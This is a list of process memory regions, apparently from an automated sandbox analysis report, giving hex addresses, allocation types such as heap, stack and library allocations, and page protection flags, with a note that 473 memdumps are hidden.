4930000
direct allocation
page read and write
1B267C10000
trusted library allocation
page read and write
FD057E000
unkown
page readonly
2D00000
direct allocation
page read and write
1E6B2211000
heap
page read and write
7FD0000
trusted library allocation
page read and write
1B262C02000
heap
page read and write
1E697E49000
heap
page read and write
7F790000
trusted library allocation
page execute and read and write
6E8000
heap
page read and write
1E6B22BB000
heap
page read and write
8D60000
direct allocation
page execute and read and write
250EC000
stack
page read and write
1CDD7FE000
stack
page read and write
1CDD97E000
stack
page read and write
1B267A22000
heap
page read and write
1E69AE94000
trusted library allocation
page read and write
1B2624AE000
heap
page read and write
1B267A91000
heap
page read and write
1B262360000
heap
page read and write
1E6B22AC000
heap
page read and write
7FF9369F0000
trusted library allocation
page read and write
71D0000
heap
page read and write
7FF936732000
trusted library allocation
page read and write
7FF936730000
trusted library allocation
page read and write
1B267AE3000
heap
page read and write
1B267CC0000
remote allocation
page read and write
1E69B118000
trusted library allocation
page read and write
8339000
heap
page read and write
7FF9369C0000
trusted library allocation
page read and write
1B2679F0000
trusted library allocation
page read and write
2D3E000
stack
page read and write
1E699830000
trusted library allocation
page read and write
1E69AEB8000
trusted library allocation
page read and write
1B267960000
trusted library allocation
page read and write
1B267EB0000
trusted library allocation
page read and write
82DA000
heap
page read and write
7FF936AB0000
trusted library allocation
page read and write
1E699E27000
heap
page read and write
FD197E000
unkown
page readonly
1E699E18000
heap
page read and write
7FF9368EA000
trusted library allocation
page read and write
7FF9369B0000
trusted library allocation
page read and write
7FF936900000
trusted library allocation
page execute and read and write
FD237E000
unkown
page readonly
804E000
stack
page read and write
1E6B2280000
heap
page read and write
7FF936A40000
trusted library allocation
page read and write
82CE000
heap
page read and write
5AF4000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
1B2679F0000
trusted library allocation
page read and write
FD187C000
stack
page read and write
4688000
trusted library allocation
page read and write
1B267920000
trusted library allocation
page read and write
1B267B00000
heap
page read and write
7FF9368F0000
trusted library allocation
page execute and read and write
1E698015000
heap
page read and write
856C000
stack
page read and write
2CF0000
direct allocation
page read and write
67E000
unkown
page read and write
1B267C20000
trusted library allocation
page read and write
1E69A537000
trusted library allocation
page read and write
746E000
stack
page read and write
1CDD77B000
stack
page read and write
82CA000
heap
page read and write
FD0B79000
stack
page read and write
1CDD2E5000
stack
page read and write
8273000
heap
page read and write
7FF936816000
trusted library allocation
page execute and read and write
4900000
heap
page execute and read and write
1B262440000
heap
page read and write
7FF936A80000
trusted library allocation
page read and write
1E697E88000
heap
page read and write
7FF936970000
trusted library allocation
page read and write
1E69AD94000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
1E6B20A0000
heap
page execute and read and write
1E69AEAA000
trusted library allocation
page read and write
1B267ACE000
heap
page read and write
85AB000
stack
page read and write
1E69A6D5000
trusted library allocation
page read and write
2AB0000
direct allocation
page read and write
7FF9369E0000
trusted library allocation
page read and write
1B267C50000
trusted library allocation
page read and write
1CDD9BE000
stack
page read and write
72A9000
heap
page read and write
719F000
stack
page read and write
1E699E07000
heap
page read and write
1E698035000
heap
page read and write
7FF936A60000
trusted library allocation
page read and write
1E699F91000
trusted library allocation
page read and write
8650000
trusted library allocation
page read and write
1E6B1F90000
heap
page execute and read and write
7FF9369A0000
trusted library allocation
page read and write
1E699880000
trusted library allocation
page read and write
7FF936A90000
trusted library allocation
page read and write
1B262D09000
heap
page read and write
1B267AD0000
heap
page read and write
1CDD3EE000
stack
page read and write
2B1B000
heap
page read and write
1E6B21CC000
heap
page read and write
9854000
direct allocation
page execute and read and write
7FF936917000
trusted library allocation
page read and write
4905000
heap
page execute and read and write
7FF936733000
trusted library allocation
page execute and read and write
1B2624BD000
heap
page read and write
1B267A5B000
heap
page read and write
1B267940000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
2B3F000
stack
page read and write
1E69AEBC000
trusted library allocation
page read and write
704000
heap
page read and write
7590000
trusted library allocation
page read and write
8290000
heap
page read and write
1E69AFCB000
trusted library allocation
page read and write
2DC0000
heap
page read and write
1B2638A0000
trusted library allocation
page read and write
2A50000
heap
page read and write
80B0000
trusted library allocation
page execute and read and write
279C000
stack
page read and write
2AF0000
heap
page read and write
1CDE98B000
stack
page read and write
1B262BF0000
trusted library allocation
page read and write
8680000
direct allocation
page read and write
1E697E37000
heap
page read and write
7FF936A00000
trusted library allocation
page read and write
1E6B22A2000
heap
page read and write
7FF936850000
trusted library allocation
page execute and read and write
8235000
trusted library allocation
page read and write
6F00000
direct allocation
page read and write
1B262D1A000
heap
page read and write
1B262478000
heap
page read and write
6F10000
direct allocation
page read and write
2DA0000
trusted library section
page read and write
1B267A50000
heap
page read and write
1B26247C000
heap
page read and write
7FF936A30000
trusted library allocation
page read and write
80E0000
trusted library allocation
page read and write
1E697D9B000
heap
page read and write
1E69A926000
trusted library allocation
page read and write
1E6AA289000
trusted library allocation
page read and write
1E6B221A000
heap
page read and write
8250000
trusted library allocation
page read and write
2A3E000
unkown
page read and write
1B267A00000
heap
page read and write
7FF9367EC000
trusted library allocation
page execute and read and write
2516F000
stack
page read and write
1B267964000
trusted library allocation
page read and write
1E697E39000
heap
page read and write
8260000
trusted library allocation
page read and write
1B2624B4000
heap
page read and write
8150000
heap
page read and write
84F0000
trusted library allocation
page read and write
1E699F80000
heap
page execute and read and write
8140000
trusted library allocation
page read and write
72E1000
heap
page read and write
4750000
heap
page read and write
1E69A51B000
trusted library allocation
page read and write
1CDE80F000
stack
page read and write
1CDDBBE000
stack
page read and write
1E69A526000
trusted library allocation
page read and write
46DC000
stack
page read and write
2BC8000
heap
page read and write
75C0000
trusted library allocation
page read and write
1E69A6B9000
trusted library allocation
page read and write
1B2678A0000
trusted library allocation
page read and write
762B000
stack
page read and write
1E697F70000
heap
page read and write
2B77000
heap
page read and write
8690000
direct allocation
page read and write
8240000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
71E1000
heap
page read and write
1B267C60000
trusted library allocation
page read and write
1E69A56C000
trusted library allocation
page read and write
7FF9368E1000
trusted library allocation
page read and write
85FE000
stack
page read and write
27AD000
stack
page read and write
1B262340000
heap
page read and write
485E000
stack
page read and write
720A000
heap
page read and write
1B262D02000
heap
page read and write
1CDDD3E000
stack
page read and write
251EF000
stack
page read and write
2DC8000
heap
page read and write
7FF936734000
trusted library allocation
page read and write
2CBF000
stack
page read and write
1E697E18000
heap
page read and write
2B43000
heap
page read and write
2512D000
stack
page read and write
4720000
trusted library allocation
page read and write
742E000
stack
page read and write
1E6A9F91000
trusted library allocation
page read and write
There are 473 hidden memdumps, click here to show them.